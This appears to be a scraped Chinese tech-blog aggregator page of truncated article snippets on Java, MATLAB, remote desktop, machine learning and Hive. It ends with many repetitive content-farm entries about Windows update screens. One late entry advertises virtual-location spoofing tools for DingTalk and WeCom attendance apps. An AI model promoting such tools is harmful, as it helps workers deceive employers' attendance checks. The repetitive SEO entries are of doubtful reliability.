    字符串解析省市区,工具类,复制粘贴可直接使用import java.util.*; import java.util.regex.Matcher; import java.util.regex.Pattern;/*** @author zqh*/ public class AddressResolutionUtil {private static String regex = "(?<province>[^省]+自治区|.*?省…...

    2024/4/18 10:04:11
  20. 数学建模预热:在MATLAB中使用GUI界面演示α粒子散射实验

    数学建模预热:在MATLAB中使用GUI界面演示α粒子散射实验前言 原子物理课上,老师对于卢瑟福原子模型以及库伦散射公式进行了推导,作为一个废物, 在走神半分钟后终究没能跟上老师的思路,导致整节课暴毙 临近数学建模,因为非计算机专业,MATLAB已经很久没有动用过了,故将之…...

    2024/4/25 20:40:58

最新文章

  1. windows远程访问树莓派ubuntu22.04 桌面 - NoMachine

    通过nomachine 实现 windows 安装 nomachine 下载&#xff1a;链接&#xff1a;https://pan.baidu.com/s/10rGBREs-AnwRz7D7QbLQ1A?pwd8651 提取码&#xff1a;8651 安装&#xff1a;下一步 下一步 使用&#xff1a; 下一步 下一步 ubuntu 安装 nomachine服务 下载&#…...

    2024/5/1 22:14:40
  2. 梯度消失和梯度爆炸的一些处理方法

    在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言&#xff0c;在此感激不尽。 权重和梯度的更新公式如下&#xff1a; w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...

    2024/3/20 10:50:27
  3. 汽车疲劳测试试验平台技术要求(北重厂家)

    汽车疲劳测试试验平台技术要求通常包括以下几个方面&#xff1a; 车辆加载能力&#xff1a;测试平台需要具备足够的承载能力&#xff0c;能够同时测试多种车型和不同重量的车辆。 动力系统&#xff1a;测试平台需要具备稳定可靠的动力系统&#xff0c;能够提供足够的力和速度来…...

    2024/5/1 13:14:16
  4. OpenHarmony开发-连接开发板调试应用

    在 OpenHarmony 开发过程中&#xff0c;连接开发板进行应用调试是一个关键步骤&#xff0c;只有在真实的硬件环境下&#xff0c;我们才能测试出应用更多的潜在问题&#xff0c;以便后续我们进行优化。本文详细介绍了连接开发板调试 OpenHarmony 应用的操作步骤。 首先&#xf…...

    2024/5/1 13:12:16
  5. 416. 分割等和子集问题(动态规划)

    题目 题解 class Solution:def canPartition(self, nums: List[int]) -> bool:# badcaseif not nums:return True# 不能被2整除if sum(nums) % 2 ! 0:return False# 状态定义&#xff1a;dp[i][j]表示当背包容量为j&#xff0c;用前i个物品是否正好可以将背包填满&#xff…...

    2024/5/1 10:25:26
  6. 【Java】ExcelWriter自适应宽度工具类(支持中文)

    工具类 import org.apache.poi.ss.usermodel.Cell; import org.apache.poi.ss.usermodel.CellType; import org.apache.poi.ss.usermodel.Row; import org.apache.poi.ss.usermodel.Sheet;/*** Excel工具类** author xiaoming* date 2023/11/17 10:40*/ public class ExcelUti…...

    2024/5/1 13:20:04
  7. Spring cloud负载均衡@LoadBalanced LoadBalancerClient

    LoadBalance vs Ribbon 由于Spring cloud2020之后移除了Ribbon&#xff0c;直接使用Spring Cloud LoadBalancer作为客户端负载均衡组件&#xff0c;我们讨论Spring负载均衡以Spring Cloud2020之后版本为主&#xff0c;学习Spring Cloud LoadBalance&#xff0c;暂不讨论Ribbon…...

    2024/5/1 21:18:12
  8. TSINGSEE青犀AI智能分析+视频监控工业园区周界安全防范方案

    一、背景需求分析 在工业产业园、化工园或生产制造园区中&#xff0c;周界防范意义重大&#xff0c;对园区的安全起到重要的作用。常规的安防方式是采用人员巡查&#xff0c;人力投入成本大而且效率低。周界一旦被破坏或入侵&#xff0c;会影响园区人员和资产安全&#xff0c;…...

    2024/5/1 4:07:45
  9. VB.net WebBrowser网页元素抓取分析方法

    在用WebBrowser编程实现网页操作自动化时&#xff0c;常要分析网页Html&#xff0c;例如网页在加载数据时&#xff0c;常会显示“系统处理中&#xff0c;请稍候..”&#xff0c;我们需要在数据加载完成后才能继续下一步操作&#xff0c;如何抓取这个信息的网页html元素变化&…...

    2024/4/30 23:32:22
  10. 【Objective-C】Objective-C汇总

    方法定义 参考&#xff1a;https://www.yiibai.com/objective_c/objective_c_functions.html Objective-C编程语言中方法定义的一般形式如下 - (return_type) method_name:( argumentType1 )argumentName1 joiningArgument2:( argumentType2 )argumentName2 ... joiningArgu…...

    2024/4/30 23:16:16
  11. 【洛谷算法题】P5713-洛谷团队系统【入门2分支结构】

    &#x1f468;‍&#x1f4bb;博客主页&#xff1a;花无缺 欢迎 点赞&#x1f44d; 收藏⭐ 留言&#x1f4dd; 加关注✅! 本文由 花无缺 原创 收录于专栏 【洛谷算法题】 文章目录 【洛谷算法题】P5713-洛谷团队系统【入门2分支结构】&#x1f30f;题目描述&#x1f30f;输入格…...

    2024/5/1 6:35:25
  12. 【ES6.0】- 扩展运算符(...)

    【ES6.0】- 扩展运算符... 文章目录 【ES6.0】- 扩展运算符...一、概述二、拷贝数组对象三、合并操作四、参数传递五、数组去重六、字符串转字符数组七、NodeList转数组八、解构变量九、打印日志十、总结 一、概述 **扩展运算符(...)**允许一个表达式在期望多个参数&#xff0…...

    2024/5/1 11:24:00
  13. 摩根看好的前智能硬件头部品牌双11交易数据极度异常!——是模式创新还是饮鸩止渴?

    文 | 螳螂观察 作者 | 李燃 双11狂欢已落下帷幕&#xff0c;各大品牌纷纷晒出优异的成绩单&#xff0c;摩根士丹利投资的智能硬件头部品牌凯迪仕也不例外。然而有爆料称&#xff0c;在自媒体平台发布霸榜各大榜单喜讯的凯迪仕智能锁&#xff0c;多个平台数据都表现出极度异常…...

    2024/5/1 4:35:02
  14. Go语言常用命令详解(二)

    文章目录 前言常用命令go bug示例参数说明 go doc示例参数说明 go env示例 go fix示例 go fmt示例 go generate示例 总结写在最后 前言 接着上一篇继续介绍Go语言的常用命令 常用命令 以下是一些常用的Go命令&#xff0c;这些命令可以帮助您在Go开发中进行编译、测试、运行和…...

    2024/5/1 20:22:59
  15. 用欧拉路径判断图同构推出reverse合法性:1116T4

    http://cplusoj.com/d/senior/p/SS231116D 假设我们要把 a a a 变成 b b b&#xff0c;我们在 a i a_i ai​ 和 a i 1 a_{i1} ai1​ 之间连边&#xff0c; b b b 同理&#xff0c;则 a a a 能变成 b b b 的充要条件是两图 A , B A,B A,B 同构。 必要性显然&#xff0…...

    2024/4/30 22:14:26
  16. 【NGINX--1】基础知识

    1、在 Debian/Ubuntu 上安装 NGINX 在 Debian 或 Ubuntu 机器上安装 NGINX 开源版。 更新已配置源的软件包信息&#xff0c;并安装一些有助于配置官方 NGINX 软件包仓库的软件包&#xff1a; apt-get update apt install -y curl gnupg2 ca-certificates lsb-release debian-…...

    2024/5/1 6:34:45
  17. Hive默认分割符、存储格式与数据压缩

    目录 1、Hive默认分割符2、Hive存储格式3、Hive数据压缩 1、Hive默认分割符 Hive创建表时指定的行受限&#xff08;ROW FORMAT&#xff09;配置标准HQL为&#xff1a; ... ROW FORMAT DELIMITED FIELDS TERMINATED BY \u0001 COLLECTION ITEMS TERMINATED BY , MAP KEYS TERMI…...

    2024/4/30 22:57:18
  18. 【论文阅读】MAG:一种用于航天器遥测数据中有效异常检测的新方法

    文章目录 摘要1 引言2 问题描述3 拟议框架4 所提出方法的细节A.数据预处理B.变量相关分析C.MAG模型D.异常分数 5 实验A.数据集和性能指标B.实验设置与平台C.结果和比较 6 结论 摘要 异常检测是保证航天器稳定性的关键。在航天器运行过程中&#xff0c;传感器和控制器产生大量周…...

    2024/4/30 20:39:53
  19. --max-old-space-size=8192报错

    vue项目运行时&#xff0c;如果经常运行慢&#xff0c;崩溃停止服务&#xff0c;报如下错误 FATAL ERROR: CALL_AND_RETRY_LAST Allocation failed - JavaScript heap out of memory 因为在 Node 中&#xff0c;通过JavaScript使用内存时只能使用部分内存&#xff08;64位系统&…...

    2024/5/1 4:45:02
  20. 基于深度学习的恶意软件检测

    恶意软件是指恶意软件犯罪者用来感染个人计算机或整个组织的网络的软件。 它利用目标系统漏洞&#xff0c;例如可以被劫持的合法软件&#xff08;例如浏览器或 Web 应用程序插件&#xff09;中的错误。 恶意软件渗透可能会造成灾难性的后果&#xff0c;包括数据被盗、勒索或网…...

    2024/5/1 8:32:56
  21. JS原型对象prototype

    让我简单的为大家介绍一下原型对象prototype吧&#xff01; 使用原型实现方法共享 1.构造函数通过原型分配的函数是所有对象所 共享的。 2.JavaScript 规定&#xff0c;每一个构造函数都有一个 prototype 属性&#xff0c;指向另一个对象&#xff0c;所以我们也称为原型对象…...

    2024/5/1 14:33:22
  22. C++中只能有一个实例的单例类

    C中只能有一个实例的单例类 前面讨论的 President 类很不错&#xff0c;但存在一个缺陷&#xff1a;无法禁止通过实例化多个对象来创建多名总统&#xff1a; President One, Two, Three; 由于复制构造函数是私有的&#xff0c;其中每个对象都是不可复制的&#xff0c;但您的目…...

    2024/5/1 11:51:23
  23. python django 小程序图书借阅源码

    开发工具&#xff1a; PyCharm&#xff0c;mysql5.7&#xff0c;微信开发者工具 技术说明&#xff1a; python django html 小程序 功能介绍&#xff1a; 用户端&#xff1a; 登录注册&#xff08;含授权登录&#xff09; 首页显示搜索图书&#xff0c;轮播图&#xff0…...

    2024/5/1 5:23:20
  24. 电子学会C/C++编程等级考试2022年03月(一级)真题解析

    C/C++等级考试(1~8级)全部真题・点这里 第1题:双精度浮点数的输入输出 输入一个双精度浮点数,保留8位小数,输出这个浮点数。 时间限制:1000 内存限制:65536输入 只有一行,一个双精度浮点数。输出 一行,保留8位小数的浮点数。样例输入 3.1415926535798932样例输出 3.1…...

    2024/5/1 20:56:20
  25. 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...

    解析如下&#xff1a;1、长按电脑电源键直至关机&#xff0c;然后再按一次电源健重启电脑&#xff0c;按F8健进入安全模式2、安全模式下进入Windows系统桌面后&#xff0c;按住“winR”打开运行窗口&#xff0c;输入“services.msc”打开服务设置3、在服务界面&#xff0c;选中…...

    2022/11/19 21:17:18
  26. 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。

    %读入6幅图像&#xff08;每一幅图像的大小是564*564&#xff09; f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...

    2022/11/19 21:17:16
  27. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...

    win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面&#xff0c;在等待界面中我们需要等待操作结束才能关机&#xff0c;虽然这比较麻烦&#xff0c;但是对系统进行配置和升级…...

    2022/11/19 21:17:15
  28. 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...

    有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows&#xff0c;请勿关闭计算机”的提示&#xff0c;要过很久才能进入系统&#xff0c;有的用户甚至几个小时也无法进入&#xff0c;下面就教大家这个问题的解决方法。第一种方法&#xff1a;我们首先在左下角的“开始…...

    2022/11/19 21:17:14
  29. win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...

    置信有很多用户都跟小编一样遇到过这样的问题&#xff0c;电脑时发现开机屏幕显现“正在配置Windows Update&#xff0c;请勿关机”(如下图所示)&#xff0c;而且还需求等大约5分钟才干进入系统。这是怎样回事呢&#xff1f;一切都是正常操作的&#xff0c;为什么开时机呈现“正…...

    2022/11/19 21:17:13
  30. 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...

    Win7系统开机启动时总是出现“配置Windows请勿关机”的提示&#xff0c;没过几秒后电脑自动重启&#xff0c;每次开机都这样无法进入系统&#xff0c;此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一&#xff1a;开机按下F8&#xff0c;在出现的Windows高级启动选…...

    2022/11/19 21:17:12
  31. 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...

    有不少windows10系统用户反映说碰到这样一个情况&#xff0c;就是电脑提示正在准备windows请勿关闭计算机&#xff0c;碰到这样的问题该怎么解决呢&#xff0c;现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法&#xff1a;1、2、依次…...

    2022/11/19 21:17:11
  32. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...

    今天和大家分享一下win7系统重装了Win7旗舰版系统后&#xff0c;每次关机的时候桌面上都会显示一个“配置Windows Update的界面&#xff0c;提示请勿关闭计算机”&#xff0c;每次停留好几分钟才能正常关机&#xff0c;导致什么情况引起的呢&#xff1f;出现配置Windows Update…...

    2022/11/19 21:17:10
  33. 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...

    只能是等着&#xff0c;别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚&#xff0c;只能是考虑备份数据后重装系统了。解决来方案一&#xff1a;管理员运行cmd&#xff1a;net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...

    2022/11/19 21:17:09
  34. 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?

    原标题&#xff1a;电脑提示“配置Windows Update请勿关闭计算机”怎么办&#xff1f;win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢&#xff1f;一般的方…...

    2022/11/19 21:17:08
  35. 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...

    关机提示 windows7 正在配置windows 请勿关闭计算机 &#xff0c;然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;关机提示 windows7 正在配…...

    2022/11/19 21:17:05
  36. 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...

    钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...

    2022/11/19 21:17:05
  37. 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...

    前几天班里有位学生电脑(windows 7系统)出问题了&#xff0c;具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面&#xff0c;长时间没反应&#xff0c;无法进入系统。这个问题原来帮其他同学也解决过&#xff0c;网上搜了不少资料&#x…...

    2022/11/19 21:17:04
  38. 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...

    本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法&#xff0c;并在最后教给你1种保护系统安全的好方法&#xff0c;一起来看看&#xff01;电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中&#xff0c;添加了1个新功能在“磁…...

    2022/11/19 21:17:03
  39. 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...

    许多用户在长期不使用电脑的时候&#xff0c;开启电脑发现电脑显示&#xff1a;配置windows更新失败&#xff0c;正在还原更改&#xff0c;请勿关闭计算机。。.这要怎么办呢&#xff1f;下面小编就带着大家一起看看吧&#xff01;如果能够正常进入系统&#xff0c;建议您暂时移…...

    2022/11/19 21:17:02
  40. 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...

    配置windows update失败 还原更改 请勿关闭计算机&#xff0c;电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;配置windows update失败 还原更改 请勿关闭计算机&#x…...

    2022/11/19 21:17:01
  41. 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...

    不知道大家有没有遇到过这样的一个问题&#xff0c;就是我们的win7系统在关机的时候&#xff0c;总是喜欢显示“准备配置windows&#xff0c;请勿关机”这样的一个页面&#xff0c;没有什么大碍&#xff0c;但是如果一直等着的话就要两个小时甚至更久都关不了机&#xff0c;非常…...

    2022/11/19 21:17:00
  42. 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...

    当电脑出现正在准备配置windows请勿关闭计算机时&#xff0c;一般是您正对windows进行升级&#xff0c;但是这个要是长时间没有反应&#xff0c;我们不能再傻等下去了。可能是电脑出了别的问题了&#xff0c;来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...

    2022/11/19 21:16:59
  43. 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...

    我们使用电脑的过程中有时会遇到这种情况&#xff0c;当我们打开电脑之后&#xff0c;发现一直停留在一个界面&#xff1a;“配置Windows Update失败&#xff0c;还原更改请勿关闭计算机”&#xff0c;等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢&#xff0…...

    2022/11/19 21:16:58
  44. 如何在iPhone上关闭“请勿打扰”

    Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...

    2022/11/19 21:16:57